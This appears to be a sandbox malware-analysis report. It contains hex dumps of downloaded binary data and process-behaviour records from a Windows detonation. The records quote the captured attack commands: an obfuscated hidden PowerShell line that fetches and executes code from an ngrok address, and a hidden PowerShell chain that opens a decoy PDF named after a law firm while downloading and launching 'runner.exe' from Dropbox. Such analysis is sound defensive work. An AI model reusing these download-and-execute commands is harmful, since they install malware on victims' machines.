                                                                                                                                                                                                                                                                                                      2024-12-10 17:41:50 UTC16384INData Raw: d6 53 00 eb 15 dc 15 58 d8 53 00 df e0 f6 c4 41 75 08 dd d8 dd 05 58 d8 53 00 dd 5e 18 83 7f 08 03 7e 3e 8b 57 0c 8b 42 0c 8b 0f 53 50 e8 3e d7 ff ff dc 15 d0 d6 53 00 df e0 f6 c4 05 7a 0a dd d8 dd 05 d0 d6 53 00 eb 15 dc 15 58 d8 53 00 df e0 f6 c4 41 75 08 dd d8 dd 05 58 d8 53 00 dd 5e 20 83 7f 08 04 7e 31 8b 4f 0c 8b 51 10 8b 0f 53 52 e8 fa d6 ff ff dc 0d b0 d7 53 00 e8 5f 60 0a 00 3b c3 7d 04 33 c0 eb 0c 3d 00 ff 00 00 7e 05 b8 00 ff 00 00 89 46 2c 83 7f 08 05 7e 23 8b 47 0c 8b 48 14 51 8b 0f e8 24 d7 ff ff 3b c3 7d 04 33 c0 eb 0a 83 f8 0f 7e 05 b8 0f 00 00 00 89 46 28 83 7f 08 06 7e 16 8b 57 0c 8b 42 18 8b 0f 50 e8 eb f0 09 00 85 c0 0f 95 c1 88 4e 40 83 7f 08 07 7e 16 8b 57 0c 8b 42 1c 8b 0f 50 e8 cf f0 09 00 85 c0 0f 95 c1 88 4e 41 5f 8b c6 5e 5b c2
                                                                                                                                                                                                                                                                                                      Data Ascii: SXSAuXS^~>WBSP>SzSXSAuXS^ ~1OQSRS_`;}3=~F,~#GHQ$;}3~F(~WBPN@~WBPNA_^[
                                                                                                                                                                                                                                                                                                      2024-12-10 17:41:50 UTC16002INData Raw: 08 7e 24 8b 55 0c 8b 42 20 8b 4d 00 50 e8 be 97 ff ff 3b c7 7d 04 33 c0 eb 0a 83 f8 0f 7e 05 b8 0f 00 00 00 89 46 28 83 7d 08 09 0f 8e 9f 00 00 00 8b 55 0c 8d 4c 24 10 51 8b 4d 00 83 c2 24 52 89 7c 24 18 89 7c 24 1c 89 7c 24 20 e8 df 95 09 00 8d 44 24 10 50 68 88 d8 53 00 8d 4c 24 24 e8 1c 99 02 00 8b c8 e8 15 8f 02 00 8b 4c 24 1c 51 8a d8 e8 89 dc 02 00 83 c4 04 84 db 74 0a c6 46 40 01 c6 46 44 00 eb 3b 8d 54 24 10 52 68 80 d8 53 00 8d 4c 24 24 e8 e5 98 02 00 8b c8 e8 de 8e 02 00 8a d8 8b 44 24 1c 50 e8 52 dc 02 00 83 c4 04 84 db c6 46 40 00 74 06 c6 46 44 00 eb 04 c6 46 44 01 8b 4c 24 10 51 e8 33 dc 02 00 83 c4 04 83 7d 08 0a 7e 17 8b 55 0c 8b 42 28 8b 4d 00 50 e8 db b0 09 00 85 c0 0f 95 c1 88 4e 41 5f 8b c6 5e 5d 5b 83 c4 18 c2 08 00 cc cc cc cc cc cc
                                                                                                                                                                                                                                                                                                      Data Ascii: ~$UB MP;}3~F(}UL$QM$R|$|$|$ D$PhSL$$L$QtF@FD;T$RhSL$$D$PRF@tFDFDL$Q3}~UB(MPNA_^][
                                                                                                                                                                                                                                                                                                      2024-12-10 17:41:50 UTC16384INData Raw: e8 19 21 09 00 85 c0 89 44 24 10 0f 84 e4 03 00 00 8b 48 34 8b 59 24 8b 4e 1c 85 c9 74 12 80 78 25 1a 0f 85 cd 03 00 00 85 db 0f 84 c5 03 00 00 83 f9 09 0f 87 bc 03 00 00 ff 24 8d 80 02 41 00 83 7e 08 01 0f 85 ab 03 00 00 8b 5e 0c 8b cb e8 da 24 ff ff 83 f8 03 0f 85 98 03 00 00 8b 46 10 85 c0 0f 84 8d 03 00 00 8b cb e8 2f 32 05 00 8b 40 54 50 57 e8 15 37 07 00 83 c4 08 85 c0 0f 84 71 03 00 00 8b 74 24 10 50 8b ce c6 46 25 1a e8 2a da 07 00 68 30 d5 40 00 8b ce e8 ce da 07 00 5f 5e 5b 8b e5 5d c3 8b 46 08 85 c0 0f 85 43 03 00 00 57 8b cb e8 64 64 06 00 8b 16 89 44 24 10 db 44 24 10 52 83 ec 08 8d 4e 14 dd 1c 24 e8 2b 2f 05 00 5f 5e 5b 8b e5 5d c3 83 7e 08 03 0f 85 11 03 00 00 8b 46 0c 8b 08 51 8b cf e8 5d 58 ff ff 8b 56 0c 89 44 24 18 8b 42 04 50 8b cf e8
                                                                                                                                                                                                                                                                                                      Data Ascii: !D$H4Y$Ntx%$A~^$F/2@TPW7qt$PF%*h0@_^[]FCWddD$D$RN$+/_^[]~FQ]XVD$BP
                                                                                                                                                                                                                                                                                                      2024-12-10 17:41:50 UTC16384INData Raw: 0f 84 84 01 00 00 85 f6 0f 84 7c 01 00 00 8b 7f 54 8d 47 28 89 7c 24 18 8b f0 b9 07 00 00 00 8d 7c 24 54 f3 a5 8b 4d 08 8b 11 52 50 89 44 24 24 e8 e9 41 02 00 8b 45 0c 8b 54 24 20 50 6a 00 8d 4c 24 54 51 52 e8 24 85 06 00 8b 7c 24 34 8b 44 24 2c b9 07 00 00 00 8d 74 24 6c f3 a5 8b 7c 24 38 83 c4 18 3b f8 0f 84 85 00 00 00 8d 44 24 54 50 e8 c8 30 02 00 83 c4 04 33 f6 8d 49 00 8d 4c 24 20 51 8d 54 24 48 56 52 e8 20 31 02 00 8b 4f 54 83 c4 0c 6a 00 8d 44 24 24 50 51 8b cb e8 bb 56 08 00 8b 44 24 14 8b 48 54 6a 00 8d 54 24 24 52 51 8b cb e8 55 57 08 00 8d 54 24 54 52 8d 44 24 24 50 e8 06 32 02 00 83 c4 08 46 83 fe 04 7c ad 8b 4c 24 54 8b 54 24 58 8b 44 24 5c 89 4c 24 44 8b 4c 24 60 89 54 24 48 89 44 24 4c 89 4c 24 50 8b 45 08 8b 10 8d 70 14 52 8b ce e8 cd f0
                                                                                                                                                                                                                                                                                                      Data Ascii: |TG(|$|$TMRPD$$AET$ PjL$TQR$|$4D$,t$l|$8;D$TP03IL$ QT$HVR 1OTjD$$PQVD$HTjT$$RQUWT$TRD$$P2F|L$TT$XD$\L$DL$`T$HD$LL$PEpR
                                                                                                                                                                                                                                                                                                      2024-12-10 17:41:50 UTC382INData Raw: 52 8b 54 24 60 2b d1 8b 4c 24 4c 03 d5 03 d1 52 03 c7 50 03 cd 51 e8 93 f0 01 00 8b 84 24 88 00 00 00 8b 8c 24 80 00 00 00 8d 54 24 68 52 8b 94 24 88 00 00 00 03 c7 50 8b 84 24 84 00 00 00 03 cd 51 03 d7 52 03 c5 50 e8 61 f0 01 00 8b 4c 24 54 8b 41 04 8b 54 24 38 8b 4a 04 8b 13 83 c4 28 8d bc 24 a4 00 00 00 57 8d bc 24 98 00 00 00 57 8d 7c 24 5c 57 50 8d 44 24 24 50 51 8b cb ff 52 0c 84 c0 74 27 8d 4c 24 68 51 8b 4c 24 30 e8 1b df 02 00 8b 16 8b 4c 24 3c 52 6a 00 e8 8d af 04 00 5b 5d 5f 5e 81 c4 c4 01 00 00 c3 8b 06 8b 4c 24 3c 50 6a fa e8 74 af 04 00 5b 5d 5f 5e 81 c4 c4 01 00 00 c3 8b 0e 51 6a fb 8b cd e8 5d af 04 00 5b 5d 5f 5e 81 c4 c4 01 00 00 c3 83 7e 08 03 0f 8c 77 16 00 00 8d 54 24 14 52 8d 44 24 2c 50 8d 7c 24 4c e8 35 83 ff ff 83 c4 08 85 c0 0f
                                                                                                                                                                                                                                                                                                      Data Ascii: RT$`+L$LRPQ$$T$hR$P$QRPaL$TAT$8J($W$W|$\WPD$$PQRt'L$hQL$0L$<Rj[]_^L$<Pjt[]_^Qj][]_^~wT$RD$,P|$L5
                                                                                                                                                                                                                                                                                                      2024-12-10 17:41:50 UTC16384INData Raw: e8 bb f1 08 00 89 44 24 10 8b 44 24 28 8b 78 04 33 ed 3b c3 0f 85 bb 00 00 00 8d 4c 24 44 51 8d 54 24 18 52 e8 57 f2 01 00 83 c4 08 85 c0 0f 84 a1 00 00 00 8b 44 24 48 8b 4c 24 1c 3b c1 7f 14 0f 85 8f 00 00 00 8b 44 24 44 3b 44 24 14 0f 8e 81 00 00 00 6a 40 e8 25 33 11 00 83 c4 04 85 c0 74 2b 8b 57 04 8b 4c 24 20 8b 6f 0c 6a 00 6a 04 6a 00 52 2b 4c 24 2c 8b 54 24 28 51 2b 54 24 28 52 55 8b c8 e8 b7 2e 0b 00 8b e8 eb 02 33 ed 33 c0 50 6a 01 50 50 89 84 24 b4 00 00 00 89 84 24 b8 00 00 00 8d 84 24 b4 00 00 00 50 8d 4c 24 28 51 55 57 e8 38 70 02 00 8b 44 24 3c 8b 4c 24 34 8d 54 24 34 52 f7 d8 50 f7 d9 51 8b fd e8 2e ef 01 00 83 c4 2c 8d 54 24 54 52 e8 e1 ee 01 00 8b 44 24 30 83 c4 04 85 c0 74 05 8b 40 04 eb 02 33 c0 8b 54 24 10 85 d2 0f 94 c2 8d 4c 24 54 51
                                                                                                                                                                                                                                                                                                      Data Ascii: D$D$(x3;L$DQT$RWD$HL$;D$D;D$j@%3t+WL$ ojjjR+L$,T$(Q+T$(RU.33PjPP$$$PL$(QUW8pD$<L$4T$4RPQ.,T$TRD$0t@3T$L$TQ
                                                                                                                                                                                                                                                                                                      2024-12-10 17:41:51 UTC16384INData Raw: 3c 20 74 04 3c 3d 75 0d 3b ca 7d 09 8a 46 01 46 41 84 c0 75 eb 8a 06 32 db 84 c0 74 3f 8b ce 2b cf 3b ca 7d 37 3c 31 74 28 6a 04 68 98 dd 53 00 56 e8 fa cf 0a 00 83 c4 0c 85 c0 74 14 6a 03 68 2c e2 53 00 56 e8 e6 cf 0a 00 83 c4 0c 85 c0 75 0b 5f b0 01 5e 0f b6 c0 5b c2 0c 00 5f 5e 0f b6 c3 5b c2 0c 00 cc cc cc cc cc cc cc cc cc cc cc 8b 44 24 04 8a 08 84 c9 55 8b 6c 24 10 57 8b 7c 24 10 74 1b 8b d0 2b d7 80 f9 20 74 05 80 f9 3d 75 0d 3b d5 7d 09 8a 48 01 40 42 84 c9 75 e9 8a 08 33 d2 84 c9 74 22 56 8b f0 2b f7 8d 64 24 00 80 f9 0d 74 13 80 f9 0a 74 0e 3b f5 7d 0a 8a 4c 02 01 42 46 84 c9 75 e8 5e 80 7c 02 ff 20 5f 5d 75 0a 8a 4c 10 fe 4a 80 f9 20 74 f6 52 50 e8 ed 95 01 00 83 c4 08 c2 0c 00 cc cc cc cc cc cc cc 83 ec 18 53 56 8b 74 24 24 57 68 54 e4 53 00
                                                                                                                                                                                                                                                                                                      Data Ascii: < t<=u;}FFAu2t?+;}7<1t(jhSVtjh,SVu_^[_^[D$Ul$W|$t+ t=u;}H@Bu3t"V+d$tt;}LBFu^| _]uLJ tRPSVt$$WhTS


                                                                                                                                                                                                                                                                                                      Statistics

                                                                                                                                                                                                                                                                                                      CPU Usage

                                                                                                                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                                                                                                                      Memory Usage

                                                                                                                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                                                                                                                      High Level Behavior Distribution

                                                                                                                                                                                                                                                                                                      Click to dive into process behavior distribution

                                                                                                                                                                                                                                                                                                      Behavior

                                                                                                                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                                                                                                                      System Behavior

                                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                                      Target ID:1
                                                                                                                                                                                                                                                                                                      Start time:12:41:14
                                                                                                                                                                                                                                                                                                      Start date:10/12/2024
                                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                      Commandline:"C:\Windows\System32\cmd.exe" /c pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias 29ca71 curl ; sal a4a9b9 iEx ; a4a9b9(29ca71 -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/147a893e0e699b17117c599fde51f7ef -UseBasicParsing)
                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff6a37c0000
                                                                                                                                                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                                      Target ID:2
                                                                                                                                                                                                                                                                                                      Start time:12:41:14
                                                                                                                                                                                                                                                                                                      Start date:10/12/2024
                                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                                      Target ID:4
                                                                                                                                                                                                                                                                                                      Start time:12:41:14
                                                                                                                                                                                                                                                                                                      Start date:10/12/2024
                                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                      Commandline:pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias 29ca71 curl ; sal a4a9b9 iEx ; a4a9b9(29ca71 -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/147a893e0e699b17117c599fde51f7ef -UseBasicParsing)
                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff741d30000
                                                                                                                                                                                                                                                                                                      File size:452'608 bytes
                                                                                                                                                                                                                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                                      Target ID:6
                                                                                                                                                                                                                                                                                                      Start time:12:41:28
                                                                                                                                                                                                                                                                                                      Start date:10/12/2024
                                                                                                                                                                                                                                                                                                      Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                      Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk https://www.dropbox.com/scl/fi/dgiur64vawmdx9alqw6et/Lewis-Silkin-LLP.pdf?rlkey=kduhqrnp00rj44rjeppuw31qk&dl=1
                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff7fb980000
                                                                                                                                                                                                                                                                                                      File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                      MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                                      Target ID:7
                                                                                                                                                                                                                                                                                                      Start time:12:41:29
                                                                                                                                                                                                                                                                                                      Start date:10/12/2024
                                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff7b4ee0000
                                                                                                                                                                                                                                                                                                      File size:55'320 bytes
                                                                                                                                                                                                                                                                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                                      Target ID:8
                                                                                                                                                                                                                                                                                                      Start time:12:41:29
                                                                                                                                                                                                                                                                                                      Start date:10/12/2024
                                                                                                                                                                                                                                                                                                      Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                      Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate https://www.dropbox.com/scl/fi/dgiur64vawmdx9alqw6et/Lewis-Silkin-LLP.pdf?rlkey=kduhqrnp00rj44rjeppuw31qk&dl=1
                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff7fb980000
                                                                                                                                                                                                                                                                                                      File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                      MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                                      Target ID:9
                                                                                                                                                                                                                                                                                                      Start time:12:41:29
                                                                                                                                                                                                                                                                                                      Start date:10/12/2024
                                                                                                                                                                                                                                                                                                      Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                      Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2232 --field-trial-handle=2032,i,11252939231684857170,10877690503001788622,262144 /prefetch:3
                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff7fb980000
                                                                                                                                                                                                                                                                                                      File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                      MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                                      Target ID:10
                                                                                                                                                                                                                                                                                                      Start time:12:41:30
                                                                                                                                                                                                                                                                                                      Start date:10/12/2024
                                                                                                                                                                                                                                                                                                      Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                      Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2072 --field-trial-handle=1992,i,9439296956823989521,1542117106536220909,262144 /prefetch:3
                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff7fb980000
                                                                                                                                                                                                                                                                                                      File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                      MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                                      Target ID:15
                                                                                                                                                                                                                                                                                                      Start time:14:07:43
                                                                                                                                                                                                                                                                                                      Start date:10/12/2024
                                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user~1\AppData\Local\Temp\836808032.bat" "
                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff6a37c0000
                                                                                                                                                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                                      Target ID:16
                                                                                                                                                                                                                                                                                                      Start time:14:07:43
                                                                                                                                                                                                                                                                                                      Start date:10/12/2024
                                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                                      Target ID:17
                                                                                                                                                                                                                                                                                                      Start time:14:07:43
                                                                                                                                                                                                                                                                                                      Start date:10/12/2024
                                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                      Commandline:powershell -WindowStyle Hidden -Command "$RandomPDF = \"$env:temp\$(Get-Random).pdf\"; $RandomEXE = \"$env:temp\$(Get-Random).exe\"; IWR -Uri 'https://www.dropbox.com/scl/fi/dgiur64vawmdx9alqw6et/Lewis-Silkin-LLP.pdf?rlkey=kduhqrnp00rj44rjeppuw31qk&dl=1' -OutFile $RandomPDF ; Start-Process msedge.exe -ArgumentList \"--kiosk $RandomPDF\" ; IWR -Uri 'https://www.dropbox.com/scl/fi/qzqf3fr40w71dq8uwcnec/runner.exe?rlkey=dfl8hxamjpp5zdy8yzn5ejrol&dl=1' -OutFile $RandomEXE ; start $RandomEXE"
                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff741d30000
                                                                                                                                                                                                                                                                                                      File size:452'608 bytes
                                                                                                                                                                                                                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                                      Target ID:19
                                                                                                                                                                                                                                                                                                      Start time:14:07:45
                                                                                                                                                                                                                                                                                                      Start date:10/12/2024
                                                                                                                                                                                                                                                                                                      Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                      Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6812 --field-trial-handle=1992,i,9439296956823989521,1542117106536220909,262144 /prefetch:8
                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff7fb980000
                                                                                                                                                                                                                                                                                                      File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                      MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                                      Target ID:21
                                                                                                                                                                                                                                                                                                      Start time:14:07:45
                                                                                                                                                                                                                                                                                                      Start date:10/12/2024
                                                                                                                                                                                                                                                                                                      Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                      Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=7096 --field-trial-handle=1992,i,9439296956823989521,1542117106536220909,262144 /prefetch:8
                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff7fb980000
                                                                                                                                                                                                                                                                                                      File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                      MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                                      Target ID:26
                                                                                                                                                                                                                                                                                                      Start time:14:07:52
                                                                                                                                                                                                                                                                                                      Start date:10/12/2024
                                                                                                                                                                                                                                                                                                      Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                      Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-GB --service-sandbox-type=collections --mojo-platform-channel-handle=7816 --field-trial-handle=1992,i,9439296956823989521,1542117106536220909,262144 /prefetch:8
                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff7fb980000
                                                                                                                                                                                                                                                                                                      File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                      MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                                      Target ID:28
                                                                                                                                                                                                                                                                                                      Start time:14:07:52
                                                                                                                                                                                                                                                                                                      Start date:10/12/2024
                                                                                                                                                                                                                                                                                                      Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                      Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk C:\Users\user~1\AppData\Local\Temp\1902382389.pdf
                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff7fb980000
                                                                                                                                                                                                                                                                                                      File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                      MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                                      Target ID:29
                                                                                                                                                                                                                                                                                                      Start time:14:07:55
                                                                                                                                                                                                                                                                                                      Start date:10/12/2024
                                                                                                                                                                                                                                                                                                      Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                      Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=ppapi --lang=en-GB --device-scale-factor=1 --ppapi-antialiased-text-enabled=1 --ppapi-subpixel-rendering-setting=1 --mojo-platform-channel-handle=8424 --field-trial-handle=1992,i,9439296956823989521,1542117106536220909,262144 /prefetch:6
                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff7fb980000
                                                                                                                                                                                                                                                                                                      File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                      MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
